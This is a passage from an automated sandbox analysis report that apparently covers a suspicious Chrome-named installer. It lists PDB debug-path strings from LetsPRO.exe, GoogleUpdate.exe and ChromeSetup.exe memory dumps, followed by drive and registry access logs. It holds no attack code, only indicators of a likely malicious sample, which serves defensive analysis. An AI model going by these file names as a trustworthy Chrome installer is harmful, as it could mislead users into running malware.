                  Source: Binary string: TEST_goopdateres_unsigned_bn.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108884160.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110156700.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108884160.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, goopdateres_bn.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_en.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112625418.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ko.pdb source: GoogleUpdate.exe, 0000001E.00000003.2132719778.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2133014724.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2132719778.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_ko.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_zh-TW.pdb source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008BF000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ca.pdb source: GoogleUpdate.exe, 0000001E.00000003.2110685243.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110685243.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110803785.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdate_unsigned.pdb source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, GoogleUpdate.exe, 0000001E.00000002.3261001713.0000000000121000.00000020.00000001.01000000.00000008.sdmp, GoogleUpdate.exe.30.dr, GoogleUpdate.exe.16.dr
                  Source: Binary string: GoogleUpdateBroker_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169122915.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateBroker.exe.16.dr, GoogleUpdateBroker.exe.30.dr
                  Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: LetsPRO.exe, 00000008.00000002.2082649111.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000008.00000000.2016836584.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000009.00000002.2085508018.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000009.00000000.2017338659.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000A.00000002.2085509347.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000A.00000000.2017352894.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000B.00000000.2017959585.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000B.00000002.2081423718.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000C.00000002.2179702546.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000C.00000000.2021432146.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000016.00000000.2030073468.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000016.00000002.2096564571.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000017.00000002.2101128457.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000017.00000000.2028409698.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000018.00000002.2090627708.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000018.00000000.2028772226.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000019.00000000.2028783611.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000019.00000002.2090626641.000000000026D000.00000002.00000001.01000000.00000004.sdmp
                  Source: Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056h& source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_pt-PT.pdb source: goopdateres_pt-PT.dll.16.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_am.pdb source: GoogleUpdate.exe, 0000001E.00000003.2107956002.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107956002.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108069440.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_am.dll.30.dr
                  Source: Binary string: bols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleCrashHandler_unsigned.pdbp source: ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105347760.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105264031.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler.exe.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_cs.pdb source: GoogleUpdate.exe, 0000001E.00000003.2110976317.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110976317.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111107544.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_cs.dll.16.dr
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*u source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*sC source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_da.pdb source: GoogleUpdate.exe, 0000001E.00000003.2111298114.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111298114.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111407957.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_iw.pdb source: GoogleUpdate.exe, 0000001E.00000003.2127191270.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2127191270.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2127845823.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ja.pdb source: GoogleUpdate.exe, 0000001E.00000003.2129974854.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2129974854.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2130517355.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_psuser_unsigned_64.pdbF source: GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psuser_64.dll.30.dr, psuser_64.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_et.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115013262.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_et.dll.30.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389\LetsPRO.execation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE source: LetsPRO.exe, 00000004.00000003.2231954101.0000000000624000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{d4876bf7-244b-4c34-87a7-98ddf5c5224d}\*.*ecation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE source: LetsPRO.exe, 00000004.00000003.2233011919.0000000000628000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\LetsPRO.exern source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdateComRegisterShell64_unsigned.pdbR source: GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107741736.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ons\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B784 source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdateComRegisterShell64_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107741736.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: sutup-Chrome.13.26.x64.msi, MSIB54D.tmp.1.dr
                  Source: Binary string: TEST_goopdateres_unsigned_hr.pdb source: GoogleUpdate.exe, 0000001E.00000003.2118451077.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118651881.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118451077.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_hr.dll.16.dr
                  Source: Binary string: TEST_psuser_unsigned_64.pdb source: GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psuser_64.dll.30.dr, psuser_64.dll.16.dr
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4 source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_hi.pdb source: GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118068933.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\LetsPRO.exeU source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdateOnDemand_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2170069383.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169861546.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateOnDemand.exe.30.dr, GoogleUpdateOnDemand.exe.16.dr
                  Source: Binary string: 785491~1.LOCntkrnlmp.pdb5x source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdate_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5r source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aischeduler2.pdb source: sutup-Chrome.13.26.x64.msi, 5bb04c.rbs.1.dr
                  Source: Binary string: TEST_goopdateres_unsigned_ms.pdb source: goopdateres_ms.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_fr.pdb source: GoogleUpdate.exe, 0000001E.00000003.2116622503.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116824716.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116622503.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fr.dll.30.dr
                  Source: Binary string: msvcr100.i386.pdb source: LetsPRO.exe, LetsPRO.exe, 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000D.00000002.2181610240.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000E.00000002.2186367127.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000F.00000002.2173589064.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000011.00000002.2191724074.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000012.00000002.2192475621.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000013.00000002.2192454597.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001A.00000002.2192585742.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001B.00000002.2192407874.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001C.00000002.2191917426.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001D.00000002.2181725589.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001F.00000002.2209318696.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp
                  Source: Binary string: GoogleCrashHandler64_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler64.exe.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_zh-CN.pdb source: GoogleUpdate.exe, 0000001E.00000002.3269312732.0000000000E60000.00000002.00000001.00040000.0000000D.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_kn.pdb source: GoogleUpdate.exe, 0000001E.00000003.2131480037.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131480037.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdbE source: sutup-Chrome.13.26.x64.msi, MSIB54D.tmp.1.dr
                  Source: Binary string: TEST_goopdateres_unsigned_ml.pdb source: goopdateres_ml.dll.16.dr
                  Source: Binary string: on Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_fil.pdb source: GoogleUpdate.exe, 0000001E.00000003.2116341966.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116214832.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116214832.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ur.pdb source: goopdateres_ur.dll.30.dr
                  Source: Binary string: load_prod.pdb\*.*5n source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_sv.pdb source: goopdateres_sv.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_fi.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115798328.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115924326.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115798328.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fi.dll.16.dr
                  Source: Binary string: GoogleUpdateCore_unsigned.pdbV source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104991502.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105067095.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104969687.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateCore.exe.30.dr, GoogleUpdateCore.exe.16.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_nl.pdb source: goopdateres_nl.dll.16.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\LetsPRO.exe source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ro.pdb source: goopdateres_ro.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_sw.pdb source: goopdateres_sw.dll.16.dr, goopdateres_sw.dll.30.dr
                  Source: Binary string: GoogleCrashHandler64_unsigned.pdbl source: GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler64.exe.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_hu.pdb source: GoogleUpdate.exe, 0000001E.00000003.2119453694.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119237842.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119237842.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_hu.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_ta.pdb source: goopdateres_ta.dll.16.dr
                  Source: Binary string: TEST_psmachine_unsigned.pdbJ source: GoogleUpdate.exe, 0000001E.00000003.2149107681.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psmachine.dll.16.dr
                  Source: Binary string: pplication Data\Temp\Symbols\ntkrnlmp.pdb\*.*so source: LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbl: source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_it.pdb source: GoogleUpdate.exe, 0000001E.00000003.2125024951.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2125024951.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_it.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_en-GB.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112956106.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112849387.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112849387.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_en-GB.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_sk.pdb source: goopdateres_sk.dll.16.dr, goopdateres_sk.dll.30.dr
                  Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*a+ source: LetsPRO.exe, 00000004.00000002.3261617800.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_te.pdb source: goopdateres_te.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_id.pdb source: GoogleUpdate.exe, 0000001E.00000003.2120248685.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\LetsPRO.exe4 source: LetsPRO.exe, 00000004.00000003.2233041537.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.*F source: LetsPRO.exe, 00000004.00000003.2233011919.0000000000628000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_vi.pdb source: goopdateres_vi.dll.30.dr
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\LetsPRO.exenage source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_es.pdb source: GoogleUpdate.exe, 0000001E.00000003.2113768779.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113540436.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113540436.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_es.dll.30.dr, goopdateres_es.dll.16.dr
                  Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                  Source: C:\Windows\System32\netsh.exeFile opened: c:
                  Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
